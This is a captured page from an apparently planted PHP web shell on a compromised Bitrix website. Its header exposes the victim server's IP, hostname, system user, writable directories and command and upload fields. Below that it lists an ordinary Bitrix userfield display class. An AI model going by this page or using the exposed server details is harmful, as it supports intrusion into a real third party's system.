403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/main/lib/userfield/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/main/lib/userfield/display.php
<?php

/**
 * @deprecated
 */

namespace Bitrix\Main\UserField;

use Bitrix\Main\UserField\Types\BaseType;

class Display implements IDisplay
{
	const MODE_EDIT = BaseType::MODE_EDIT;
	const MODE_VIEW = BaseType::MODE_VIEW;

	protected $userField;
	protected $additionalParameters = array();
	protected $defaultAdditionalParameters = array(
		"bVarsFromForm" => false,
	);
	protected $mode = self::MODE_VIEW;
	protected $tpl = '';

	public function __construct($mode = self::MODE_VIEW, string $tpl = '')
	{
		$this->mode = $mode;
		$this->tpl = $tpl;
		$this->additionalParameters = $this->defaultAdditionalParameters;
	}

	/**
	 * @return mixed
	 */
	public function getField()
	{
		return $this->userField;
	}

	/**
	 * @param mixed $userField
	 */
	public function setField(array $userField)
	{
		$this->userField = $userField;
	}

	public function setAdditionalParameter($param, $value, $storeAsDefault = false)
	{
		$this->additionalParameters[$param] = $value;
		if($storeAsDefault)
		{
			$this->defaultAdditionalParameters[$param] = $value;
		}
	}

	public function clear()
	{
		$this->userField = null;
		$this->additionalParameters = $this->defaultAdditionalParameters;
	}

	protected function getAdditionalParameters()
	{
		return $this->additionalParameters;
	}

	public function display()
	{
		global $USER_FIELD_MANAGER;

		$this->setAdditionalParameter('mode', $this->mode);
		//$this->setAdditionalParameter('tpl', $this->tpl);

		if($this->mode === self::MODE_EDIT)
		{
			return $USER_FIELD_MANAGER->GetPublicEdit(
				$this->getField(),
				$this->getAdditionalParameters()
			);
		}
		else
		{
			return $USER_FIELD_MANAGER->GetPublicView(
				$this->getField(),
				$this->getAdditionalParameters()
			);
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit